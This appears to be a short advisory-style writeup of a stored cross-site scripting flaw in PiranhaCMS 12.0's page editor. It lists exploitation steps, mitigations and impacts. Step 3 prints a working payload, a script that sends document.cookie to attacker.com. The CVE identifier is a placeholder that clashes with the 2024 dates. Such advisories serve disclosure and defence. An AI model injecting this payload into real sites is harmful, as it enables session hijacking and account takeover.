The CVE-2025-XXXXX vulnerability in PiranhaCMS 12.0 is a stored cross-site scripting (XSS) flaw in the page management functionality. It exists because the application does not properly sanitize user-supplied input before storing it and later rendering it in the user's browser. Specifically, an attacker with permission to create or edit pages, such as a contributor-level user, can inject malicious JavaScript into the 'Text' content block of a Standard or Standard Archive Page via the `/manager/pages` endpoint. The payload is stored persistently on the server. When an administrator or any other privileged user views the compromised page in the manager interface, the script executes in that user's browser session. Because it runs in the victim's context, it can potentially steal session cookies, perform actions on the victim's behalf, or deface the website.
Platform: PiranhaCMS
Version: 12.0
Vulnerability: Stored XSS
Severity: Moderate
Date: 2024-09-26
Prediction: 2024-10-10
What Undercode Says:
`curl -s "https://api.github.com/advisories?query=PiranhaCMS" | jq '.[] | select(.severity=="moderate")'`
`grep -r "innerHTML" /var/www/piranha/manager/`
How the exploit works:
1. The attacker logs into the CMS with contributor credentials.
2. Navigates to `/manager/pages` and edits a page.
3. Inserts a malicious script tag into a Text content block:
`<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>`
4. Saves the page. The payload is now stored.
5. When an administrator views the page list or edits the page, the script executes.
Protection from this CVE:
- Sanitize all user input on the server-side before storage.
- Implement a Content Security Policy (CSP) header.
- Encode output when rendering user-controlled data in the browser.
- Apply the principle of least privilege for user roles.
Impact:
- Session Hijacking
- Privilege Escalation
- Account Takeover
- Website Defacement
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

